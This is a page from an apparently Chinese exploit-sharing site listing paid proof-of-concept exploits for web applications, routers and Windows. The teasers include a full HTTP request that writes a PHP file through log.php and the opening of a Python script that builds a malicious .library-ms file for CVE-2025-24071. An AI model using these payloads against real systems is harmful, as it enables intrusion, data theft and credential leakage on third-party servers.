poc_秃兔安全

【通用】usdtAdmin收款管理系统log.php 任意文件写入

fofa语句yakit插件 uuidpocPOST /log.php?c=1&name=123.php HTTP/1.1 Host: xxxx User-Agent: <?php echo 66666;@unlink(__FILE__);?> content=MTIzNDU2 #具体路径会回显。另外注意ua...

dreamer2929个月前

01297

【通用】 TENDA 11N无线路由器Index 越权访问漏洞

fofa语句yakit插件 uuidpocyakit && nuclei yaml已验证

付费阅读500 Nuclei插件 POC poc_yaml

dreamer2922年前

012913

【通用】速达软件 doSavePrintTpl 存在sql注入漏洞

fofa语句yakit插件 uuid pocyaml已验证

付费阅读500 Nuclei插件 POC poc_yaml

dreamer2921年前

01298

【通用】 CVE-2025-24071 Windows 资源管理器重大漏洞poc

github链接：pocpy脚本import os import zipfile def main(): ''' 该程序生成一个恶意 .library-ms 文件，并将其打包为 ZIP 归档。用户需要输入文件名称和攻击者的 IP 地址。 ''' file_name = ...

POC

dreamer2921年前

012815

【通用】中成科信票务管理系统 ReturnTicketPlance.ashx SQL注入

fofa语句yakit插件 uuidpocyakit yamlnuclei yaml已验证

付费阅读500 Nuclei插件 POC Yakit插件

dreamer2922年前

012712

【通用】红盟发卡系统 orderContent 反序列化rce

fofa语句yakit插件 uuidpocyaml已验证

付费阅读500 POC

dreamer29212个月前

01276

【通用】 EasyCVR 视频管理平台adduser存在任意用户添加漏洞

fofa语句yakit插件 uuidpocyakit && nuclei yaml已验证

付费阅读500 Nuclei插件 POC poc_yaml

dreamer2922年前

01266

【通用】百易云资产管理系统admin.ticket.close.php存在SQL注入漏洞

fofayakit插件 uuid pocyaml已验证

付费阅读500 POC poc_yaml

dreamer2921年前

012613

【通用】dify upload SSRF

fofa语句pocyaml已验证

付费阅读500 POC

dreamer29211个月前

012612

【通用】圣乔ERP系统 DwrUtil SQL注入

fofa语句yakit插件 uuid pocyakit yamlnuclei yaml已验证

付费阅读500 Nuclei插件 POC Yakit插件

dreamer2922年前

012514

上一页 1…10 111213 14…34 下一页跳转